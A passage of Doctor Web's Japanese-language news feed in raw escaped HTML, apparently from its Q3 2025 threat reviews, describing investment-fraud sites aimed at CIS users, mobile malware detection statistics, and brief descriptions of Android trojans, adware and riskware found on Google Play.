    &lt;p&gt;特定の国のユーザーを標的にした詐欺サイトも確認されています。そのうちのいくつかはCIS諸国のユーザーを標的にしたもので、「閉ざされた投資市場を開く」チャンスを提供し、金融サービスINSIDER Xを通じて特別な限定投資商品へのアクセスを可能にすると主張しています。このサービスを利用するために、ユーザーは個人情報を提供して「リクエストを送信」するよう指示されます。&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/09_fraud_insiderx.png" class="preview"&gt;
            &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/09_fraud_insiderx.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;ロシアのユーザーを狙った詐欺サイトの1つは、大手石油・ガス会社やロシア政府ポータルサイト「Gosuslugi」と関連があるかのように見せかけた「投資プラットフォーム」にアクセスするためにアンケートに回答するよう誘っています。&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/10_fraud_gazgosusl.png" class="preview"&gt;
            &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/10_fraud_gazgosusl.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;また別の詐欺サイトはロシアの正規銀行サービスを装い、「週に5万ルーブル以上稼ぐ」ために登録するようユーザーに持ちかけていました。&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/11_fraud_finance.png" class="preview"&gt;
            &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/11_fraud_finance.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;同様の偽サイトは他の国でも確認されています。キルギスタンのユーザーは、人気のプログラムに参加して、国内最大であると称する企業に投資するよう勧めるサイトの標的となりました。&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/12_fraud_gaz.png" class="preview"&gt;
            &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/12_fraud_gaz.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;ジョージアの銀行を装った詐欺サイトでは、その「投資プラットフォーム」に参加できるとうたってユーザーをおびき寄せていました。&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/13_fraud_bankopros.png" class="preview"&gt;
            &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/13_fraud_bankopros.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;カザフスタンの銀行を模倣した同様の偽サイトでは、月6万テンゲ以上を稼ぐことができると約束しています。&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/14_fraud_bank.png" class="preview"&gt;
            &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/14_fraud_bank.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;トルコの石油・ガス会社を装ったサイトでは、投資プラットフォームに参加して「1日に最大9000トルコリラ」稼ぐことができると主張しています。&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/15_fraud_bankoffer.png" class="preview"&gt;
            &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/15_fraud_bankoffer.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    
    &lt;p&gt;政府からの給付金や補助金などといったトピックを悪用した詐欺も引き続き横行しています。カザフスタンのユーザーを標的としたそのようなサイトの1つでは、ユーザーは自分が補助金の対象かどうかを確認し、最大で500万テンゲを受け取ることができるとしています。&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 32px;"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/16_fraud_compensation.png" class="preview"&gt;
            &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_common_q3/16_fraud_compensation.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;a href="http://antifraud.drweb.com/dangerous_urls/" target="_blank"&gt;Find out more about Dr.Web non-recommended sites&lt;/a&gt;

&lt;/section&gt;

&lt;section&gt;
    
    &lt;h3&gt;モバイルデバイスを脅かす悪意のあるプログラムや望ましくないプログラム&lt;/h3&gt;

    &lt;p&gt;Dr.Web Security Space for mobile devices（モバイルデバイス向けDr.Web Security Space）によって収集された検出統計によると、2025年第3四半期に最も多く検出された脅威は広告を表示させるトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.MobiDash&amp;lng=ja"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; となりました。前四半期に首位を飾っていた &lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; は2位に転落し、その活動は大幅に減少しました。3番目に多く検出された脅威は偽アプリ &lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; となっています。&lt;/p&gt;

    &lt;p&gt;バンキング型トロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.BankBot&amp;lng=ja"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; の検出数は前四半期比で増加し、一方で &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Banker&amp;lng=ja"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; と &lt;b&gt;Android.SpyMax&lt;/b&gt; の検出数は減少しました。&lt;/p&gt;

    &lt;p&gt;8月、Doctor Webはロシア企業の従業員をスパイして機密情報を窃取する目的で使用されていた多機能バックドア &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.916.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; について記事を&lt;a href="https://news.drweb.co.jp/show/?i=15047&amp;lng=ja" target="_blank"&gt;公開&lt;/a&gt;しました。&lt;/p&gt;

    &lt;p&gt;Google Playでは第3四半期を通して70を超える悪意のあるアプリや望ましくないアプリが発見されています。それらの中にはユーザーを有料サービスに登録するトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Joker&amp;lng=ja"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; や偽アプリ &lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;、そして仮想報酬を現金化できるとうたうアプリ &lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeMoney&amp;lng=ja"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt; が含まれていました。&lt;/p&gt;

    &lt;p&gt;2025年第3四半期のモバイルマルウェアに関連した注目すべきイベント：&lt;/p&gt;

    &lt;ul&gt;
        &lt;li&gt;アドウェア型トロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.MobiDash&amp;lng=ja"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; の活動が活発化&lt;/li&gt;
        &lt;li&gt;アドウェア型トロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; の活動が減少&lt;/li&gt;
        &lt;li&gt;バンキング型トロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.BankBot&amp;lng=ja"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; の検出数が増加 &lt;/li&gt;
        &lt;li&gt;バンキング型トロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Banker&amp;lng=ja"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; と &lt;b&gt;Android.SpyMax&lt;/b&gt; による攻撃件数が減少&lt;/li&gt;
        &lt;li&gt;多機能バックドア &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.916.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; を用いてロシア企業の従業員をスパイする攻撃が確認される&lt;/li&gt;
        &lt;li&gt;Google Playから多数の脅威が拡散される&lt;/li&gt;
    &lt;/ul&gt;

    &lt;p&gt;2025 年第3四半期のモバイルデバイスを取り巻くセキュリティ脅威の状況についての詳細は&lt;a href="https://news.drweb.co.jp/show/?i=15060" target="_blank"&gt;こちらのレビュー&lt;/a&gt;をご覧ください。&lt;/p&gt;

&lt;/section&gt;</description></item><item><guid>https://news.drweb.co.jp/show/?i=15060&amp;lng=ja</guid><title>2025年第3四半期のモバイルマルウェアレビュー</title><link>https://news.drweb.co.jp/show/?i=15060&amp;lng=ja&amp;c=5</link><pubDate>Wed, 01 Oct 2025 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;2025年10月1日&lt;/b&gt;&lt;/p&gt;

&lt;section&gt;

    &lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Dr.Web Security Space for mobile devices（モバイルデバイス向けDr.Web Security Space）によって収集された検出統計によると、2025年第3四半期に最も多く検出された脅威は広告を表示させるトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.MobiDash&amp;lng=ja"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; となりました。その検出数は前四半期比で18.19%増加しています。&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

    &lt;p&gt;2番目に多く検出されたのは、2四半期連続で活動の減少が続いているアドウェア型トロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; でした。第3四半期の検出数は71.85%の減少となっています。このトロイの木馬は検出と削除を困難にするために自身のアイコンを隠し、広告を表示させます。表示される広告の種類には全画面モードでの動画も含まれています。&lt;/p&gt;

    &lt;p&gt;サイバー犯罪者によってさまざまな詐欺スキームに用いられるトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; が前四半期に引き続き3位となりました。その検出数は7.49%減少しています。多くの場合、これら悪意のあるアプリはうたわれた機能を実行する代わりに詐欺サイトや悪意のあるサイト、ブックメーカーやオンラインカジノのサイトなどさまざまなWebサイトを開きます。&lt;/p&gt;

    &lt;p&gt;バンキング型トロイの木馬では、その活動に38.88%の減少がみられたものの依然として &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Banker&amp;lng=ja"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; トロイの木馬が最も多く検出されています。&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Banker&amp;lng=ja"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; は銀行口座に不正アクセスして金銭を盗み取る目的で脅威アクターによって使用されています。このファミリーに属するトロイの木馬はフィッシング画面を表示させてログインIDとパスワードを窃取する、正規銀行アプリの外観を模倣する、SMSを傍受してワンタイムコードを盗むなどといった機能を備えています。&lt;/p&gt;

    &lt;p&gt;続いて、前四半期比18.91%増となった &lt;a href="https://vms.drweb.co.jp/search/?q=Android.BankBot&amp;lng=ja"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; トロイの木馬が2位につけました。このトロイの木馬も認証コードを傍受することでユーザーのインターネットバンキングアカウントにアクセスしようとします。そのほか、サイバー犯罪者から受け取るさまざまなコマンドを実行することもでき、それらの中には感染したデバイスの遠隔操作を可能にするものもあります。&lt;/p&gt;

    &lt;p&gt;3位となったのは &lt;b&gt;Android.SpyMax&lt;/b&gt; トロイの木馬で、その検出数は前四半期比で17.25%減少しています。&lt;b&gt;Android.SpyMax&lt;/b&gt; はスパイウェア型トロイの木馬SpyNoteのソースコードを基に作成されており、感染したデバイスの遠隔操作を含む広範な機能を備えています。&lt;/p&gt;

    &lt;p&gt;8月、Doctor Webは多機能バックドア &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.916.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; を拡散する攻撃キャンペーンについて記事を&lt;a href="https://news.drweb.co.jp/show/?i=15047&amp;lng=ja" target="_blank"&gt;公表&lt;/a&gt;しました。このマルウェアはAndroidユーザーをスパイし、機密情報を窃取する目的で使用されていました。脅威アクターはメッセンジャーを利用して被害者にメッセージを送信し、添付のAPKファイルから「アンチウイルス」（に偽装したバックドア）をインストールするよう誘導しています。Doctor Webのアンチウイルスラボではこのバックドアの最初の亜種を2025年1月に発見し、それ以来その進化を追い続けてきました。&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.916.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; はAndroidユーザー間での大量拡散を狙ったものではなく、標的型攻撃を目的に設計されたものであると考えられます。その主たる標的はロシア企業の従業員です。&lt;/p&gt;

    &lt;p&gt;Google Playでは第3四半期を通して多くの悪意のあるプログラムが拡散され、それらは合計で145万9000件以上インストールされていました。その中にはユーザーを有料サービスに登録する数十もの &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Joker&amp;lng=ja"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; トロイの木馬や悪意のある偽アプリ &lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; が含まれています。そのほか、仮想報酬を現金化できるとうたうアプリの新たなものも発見されました。&lt;/p&gt;

    &lt;div class="colorful"&gt;
        &lt;h3&gt;2025年第3四半期の主な傾向&lt;/h3&gt;
        &lt;ul&gt;
            &lt;li&gt;アドウェア型トロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.MobiDash&amp;lng=ja"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; が最も多く検出された脅威となる&lt;/li&gt;
            &lt;li&gt;アドウェア型トロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; の活動が引き続き減少&lt;/li&gt;
            &lt;li&gt;バンキング型トロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.BankBot&amp;lng=ja"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; による攻撃件数が増加&lt;/li&gt;
            &lt;li&gt;バンキング型トロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Banker&amp;lng=ja"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; と &lt;b&gt;Android.SpyMax&lt;/b&gt; の活動が減少&lt;/li&gt;
            &lt;li&gt;多機能バックドア &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.916.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; を用いた、ロシア企業の従業員に対する攻撃が確認される&lt;/li&gt;
            &lt;li&gt;Google Playで悪意のあるアプリを多数発見&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;

&lt;/section&gt;

&lt;section&gt;

    &lt;h3&gt;Dr.Web Security Space for mobile devicesによる統計&lt;/h3&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_mobile_q3/01_malware_q3_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_mobile_q3/01_malware_q3_2025_en.1.png" alt="Malware_Stat_Q3_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.MobiDash&amp;lng=ja"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;迷惑な広告を表示させるトロイの木馬です。開発者によってアプリケーション内に埋め込まれる特殊なソフトウェアモジュールです。&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;設定にハードコードされたWebサイトを開くトロイの木馬アプリです。既知の亜種ではオンラインカジノのサイトが開かれます。&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Click&amp;lng=ja"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;さまざまなWebサイトをバックグラウンドで密かに読み込むことができる、悪意のあるWhatsAppメッセンジャーMod（改造版）の検出名です。&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.673.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;迷惑な広告を表示するよう設計されたトロイの木馬です。無害でポピュラーなアプリを装って拡散されることが多く、別のマルウェアによってシステムディレクトリ内にインストールされる場合もあります。通常、これらのトロイの木馬はAndroidデバイス上に侵入すると自身の存在をユーザーから隠そうとします（ホーム画面からアイコンを「隠す」など）。&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Triada&amp;lng=ja"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5847&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Triada&amp;lng=ja"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; トロイの木馬を検出や解析から保護するよう設計されたパッカーの検出名です。多くの場合、これらトロイの木馬が埋め込まれた悪意のあるTelegramメッセンジャーMod（改造版）と一緒に用いられます。&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_mobile_q3/02_unwanted_q3_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_mobile_q3/02_unwanted_q3_2025_en.1.png" alt="Unwanted_Stat_Q3_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeMoney&amp;lng=ja"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;さまざまなタスクを完了することでお金を稼ぐことができるとうたうAndroidアプリケーションの検出名です。このアプリはタスクが完了するたびに報酬が貯まっていくかのように見せかけます。「稼いだ」お金を引き出すために（多くの場合、一般的に広く使用されている支払いシステムや銀行を指定されます）、ユーザーは一定の金額を貯める必要があるとされていますが、たとえその金額が貯まったとしても実際にお金を手にすることはできません。このウイルスレコードは、そのようなアプリのソースコードを基に作成された他の望ましくないソフトウェアの検出にも使用されます。&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Program.CloudInject&amp;lng=ja"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Program.CloudInject&amp;lng=ja"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;クラウドサービスCloudInjectと、同名のAndroidユーティリティ（&lt;a href="https://vms.drweb.co.jp/search/?q=Tool.CloudInject&amp;lng=ja"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;としてDr.Webウイルスデータベースに追加されています）を使用して改造されたAndroidアプリケーションの検出名です。アプリケーションはリモートサーバー上で改造されますが、その際、改造を行うユーザーはアプリに何が追加されるのか具体的な改造内容をコントロールすることができません。また、これらのアプリケーションは危険なシステム権限を複数要求します。改造後、ユーザーはこれらアプリをリモートで管理できるようになります（アプリをブロックする、カスタムダイアログを表示する、他のソフトウェアのインストールや削除を追跡するなど）。&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeAntiVirus&amp;lng=ja"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;アンチウイルスソフトウェアを模倣するアドウェアアプリケーションの検出名です。これらのアプリは存在しない脅威について偽の通知をすることでユーザーを騙し、ソフトウェアの完全版を購入するよう要求します。&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Program.TrackView&amp;lng=ja"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Androidデバイスを通じてユーザーを監視できるようにするアプリケーションの検出名です。このアプリを使用することで、悪意のあるアクターがデバイスの位置を追跡したり、カメラで動画や写真を撮ったり、マイクで周囲の音を聞いたり、音声を録音したりすることが可能になります。&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_mobile_q3/03_riskware_q3_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_mobile_q3/03_riskware_q3_2025_en.1.png" alt="Riskware_Stat_Q3_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.4&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;NP Managerユーティリティを使用して改造されたAndroidアプリケーションの検出名です。そのようなアプリには特殊なモジュールが組み込まれており、改造後にデジタル署名の検証をバイパスすることができます。&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Tool.LuckyPatcher&amp;lng=ja"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Androidデバイスにインストールされたアプリを改変できるようにする（パッチを作成する）ツールです。アプリの動作ロジックを変更したり特定の制限を回避したりする目的で使用されます。たとえば、ユーザーはこのツールを使用することで、バンキングアプリのルートアクセス検証を無効にしたり、ゲーム内で無限のリソースを取得したりできます。パッチを追加するために、このユーティリティは特別に作成されたスクリプトをインターネットからダウンロードしますが、このスクリプトは誰でも作成して共通のデータベースに追加することができます。そのようなスクリプトの機能が悪意のあるものである場合もあることから、このツールを使用して作成されたパッチは潜在的な脅威となる可能性があります。&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Tool.Androlua&amp;lng=ja"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;スクリプト言語Luaを使用してAndroidアプリを開発するための特別なフレームワークの、潜在的に危険なバージョンの検出名です。Luaベースアプリの主なロジックは、実行時に対応するスクリプトがインタプリタによって暗号化・復号化されるというものです。多くの場合、このフレームワークは動作するためにデフォルトで多数のシステム権限へのアクセスを要求します。その結果、フレームワークが実行するLuaスクリプトによって、取得した権限に応じたさまざまな悪意のある動作が実行される可能性があります。&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_mobile_q3/04_adware_q2_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_mobile_q3/04_adware_q2_2025_en.1.png" alt="Adware_Stat_Q3_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.AdPush&amp;lng=ja"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.Adpush&amp;lng=ja"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Androidアプリに組み込まれるアドウェアモジュールのファミリーです。ユーザーを騙すような紛らわしい、広告を含んだ通知（オペレーティングシステムからの通知に似せたものなど）を表示させます。また、さまざまな機密情報を収集し、別のアプリをダウンロードしてインストールを開始することができます。&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.ModAd&amp;lng=ja"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;その機能に特定のコードが挿入されている、WhatsAppメッセンジャーのMod（改造版）です。このコードはメッセンジャーの動作中にWebコンテンツを表示（Android WebViewコンポーネントを使用して）させることで目的のURLをロードします。これらのURLから、オンラインカジノやブックメーカー、アダルトサイトなどの広告サイトへのリダイレクトが実行されます。&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.Youmi&amp;lng=ja"&gt;&lt;b&gt;Adware.Youmi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Androidデバイスのホーム画面に広告ショートカットを追加する、望ましくないアドウェアモジュールの検出名です。&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;迷惑な広告を表示するアプリです。多くの場合、それらの広告は悪意のあるサイトや詐欺サイトにつながっています。このアプリには望ましくないアプリ &lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeMoney&amp;lng=ja"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; と同じコードベースが使用されています。&lt;/dd&gt;
    &lt;/dl&gt;

&lt;/section&gt;

&lt;section&gt;

    &lt;h3&gt;Google Play上の脅威&lt;/h3&gt;

    &lt;p&gt;2025年第3四半期、Doctor Webのアンチウイルスラボは50を超える &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Joker&amp;lng=ja"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; トロイの木馬を検出しました。これはユーザーを有料サービスに登録するトロイの木馬ファミリーです。新たに発見された亜種はメッセンジャーや各種システムツール、画像編集アプリ、カメラアプリ、ドキュメント管理アプリなどのさまざまなアプリを装って拡散されていました。&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_mobile_q3/05_Android.Joker.png" class="preview"&gt;
          &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_mobile_q3/05_Android.Joker.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p style="text-align: center;"&gt;&lt;em&gt;&lt;b&gt;Android.Joker.2412&lt;/b&gt; が潜んだシステム最適化アプリ「Clean Boost」と、&lt;b&gt;Android.Joker.2422&lt;/b&gt; が隠されていたPDFドキュメント作成アプリ「Convert Text to PDF」&lt;/em&gt;&lt;/p&gt;

